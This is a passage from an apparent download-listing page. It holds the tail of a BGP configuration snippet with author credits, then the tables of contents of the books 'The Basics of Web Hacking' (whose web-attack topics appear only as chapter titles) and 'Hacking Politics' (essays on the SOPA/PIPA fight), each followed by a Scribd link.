as-path [29049 2914 2519 ] community [2914:410 2914:1403 2914:2401 2914:3400] next-hop 192.168.1.254; ... } } Authors Tetsumune KISO t2mune@gmail.com Yoshiyuki YAMAUCHI info@greenhippo.co.jp Nobuhiro ITOU js333123@gmail.com Source

TABLE OF CONTENTS Cover image Title page Copyright Dedication [LIST] [*]Acknowledgments [/LIST] Honey Bear Lizard Baby Bird Family And Friends Security Community Scott White Technical Reviewer Syngress Team My Vices Biography Foreword [LIST] [*]Introduction [/LIST] About This Book A Hands-On Approach What's In This Book? A Quick Disclaimer [LIST] [*]Chapter 1. The Basics of Web Hacking [/LIST] Chapter Rundown: Introduction What Is A Web Application? What You Need To Know About Web Servers What You Need To Know About HTTP The Basics Of Web Hacking: Our Approach Web Apps Touch Every Part Of IT Existing Methodologies Most Common Web Vulnerabilities Setting Up A Test Environment [LIST] [*]Chapter 2. Web Server Hacking [/LIST] Chapter Rundown: Introduction Reconnaissance Port Scanning Vulnerability Scanning Exploitation Maintaining Access [LIST] [*]Chapter 3. Web Application Recon and Scanning [/LIST] Chapter Rundown: Introduction Web Application Recon Web Application Scanning [LIST] [*]Chapter 4. Web Application Exploitation with Injection [/LIST] Chapter Rundown: Introduction SQL Injection Vulnerabilities SQL Injection Attacks Sqlmap Operating System Command Injection Vulnerabilities Operating System Command Injection Attacks Web Shells [LIST] [*]Chapter 5. Web Application Exploitation with Broken Authentication and Path Traversal [/LIST] Chapter Rundown: Introduction Authentication And Session Vulnerabilities Path Traversal Vulnerabilities Brute Force Authentication Attacks Session Attacks Path Traversal Attacks [LIST] [*]Chapter 6. Web User Hacking [/LIST] Chapter Rundown: Introduction Cross-Site Scripting (XSS) Vulnerabilities Cross-Site Request Forgery (CSRF) Vulnerabilities Technical Social Engineering Vulnerabilities Web User Recon Web User Scanning Web User Exploitation Cross-Site Scripting (XSS) Attacks Reflected XSS Attacks Stored XSS Attacks Cross-Site Request Forgery (CSRF) Attacks User Attack Frameworks [LIST] [*]Chapter 7. Fixes [/LIST] Chapter Rundown: Introduction Web Server Fixes Web Application Fixes Web User Fixes [LIST] [*]Chapter 8. Next Steps [/LIST] Chapter Rundown: Introduction Security Community Groups And Events Formal Education Certifications Additional Books Index Download: http://www.scribd.com/doc/211448113/The-Basics-of-Web-Hacking

TABLE OF CONTENTS A Moment for Aaron Foreword by the Editors Hacking Politics: TLDR [LIST] [*]PART 1: The World Before SOPA/PIPA [/LIST] AARON SWARTZ For Me, It All Started with a Phone Call CORY DOCTOROW The History of the Copyright Wars JOSH LEVY Before SOPA There Was Net Neutrality MIKE MASNICK COICA, PIPA, and SOPA Are Censorship [LIST] [*]PART 2: The SOPA/PIPA Battle [/LIST] DAVID SEGAL Now I Work for Demand Progress PATRICK RUFFINI Beginning on the Right DAVID MOON Demand Progress Needs a ''Washington Guy'' GABRIEL LEVITT SOPA's Elevation of Profits Over Patients: The Online Pharmacy Story PATRICK RUFFINI Lobbying Republicans Through the Summer DAVID SEGAL The Tea Party Enters the Fray DAVID SEGAL AND DAVID MOON Gamers and Justin Bieber Join the Cause DAVID MOON Clashes With the Big Guns DAVID SEGAL Labor Sides with the Bosses JONNY 5 Turning the Tide on SOPA DAVID SEGAL What Was Lamar Smith Thinking? PATRICK RUFFINI A Punch in the Gut TIFFINIY CHENG Waking the Sleeping Giant AARON SWARTZ Who's Crazy Now? DAVID SEGAL Nearing the Point of No Return PATRICK RUFFINI The Markup ANDREW MCDIARMID AND DAVID SOHN Bring in the Nerds: The Importance of Technical Experts in Defeating SOPA and PIPA ERNESTO FALCON People Powered Politics DAVID SEGAL AND DAVID MOON To the White House DEREK SLATER On the White House's Statement OCCUPY WALL STREET Proposal to Reach Consensus on Statement Against the Stop Online Piracy Act TIFFINIY CHENG The Blackout DAVID SEGAL Congress Says: ''This Can't be Happening'' SUICIDE GIRLS I Live, Work, Play, and Love Online OPEN CONGRESS Blowing Congress Wide Open ALEXIS OHANIAN Why Reddit Helped Kill SOPA DAVID SEGAL If Reddit's Turned Off, Maybe They'll Leave the House That Day PATRICK RUFFINI Internet 1, Congress 0 ZOE LOFGREN Championing Technology and Free Speech in Congress Was Lonely But Not Anymore AARON SWARTZ After the Blackout LARRY DOWNES Who Really Stopped SOPA and Why EDWARD J. BLACK Legislative Fights Are Like Icebergs CASEY RAE-HUNTER Not in Our Names: Artists Stand Up for Expression ELIZABETH STARK I Stopped SOPA and So Did You BEN HUH Why Did the Anti-SOPA/PIPA Movement Go Viral So Quickly? DAVE DAYEN The Internet Beat SOPA and PIPA: And Mean the Entire Damn Thing DAVID MOON A Political Coming of Age PATRICK RUFFINI This Time, the System Actually Mostly Worked [LIST] [*]PART 3: Some Activism Since SOPA [/LIST] DAVID SEGAL AND DAVID MOON Cyber Security and Party Platforms DEREK KHANNA Fallout from the Copyfight JOSHUA BAUCHNER The Seizure of Dajaz1 NICOLE POWERS An Interview with Julia O'Dwyer DEMAND PROGRESS Raps with Megaupload Founder Kim Dotcom [LIST] [*]PART 4: What We've Learned [/LIST] YOCHAI BENKLER ET AL Glimpses of a Networked Public Sphere DAVID KARPF Reflecting on the SOPA Blackout: Why Did It Work, and What Does It Mean? DAVID SEGAL That Was Amazing. Can We Do It Again Sometime? [LIST] [*]PART 5: Where Do We Go from Here? [/LIST] RON PAUL The Battle for Internet Freedom Is Critical for the Liberty Movement ERIN MCKEOWN A Case for Digital Activism by Artists BRAD BURNHAM On the Freedom to Innovate MARVIN AMMORI SOPA and the Popular First Amendment CORY DOCTOROW Blanket Licenses: One Path Forward in Copyright Reform LAWRENCE LESSIG The Internet Can Help Strike at the Root Conclusion Download: http://www.scribd.com/doc/211448475/Hacking-Politics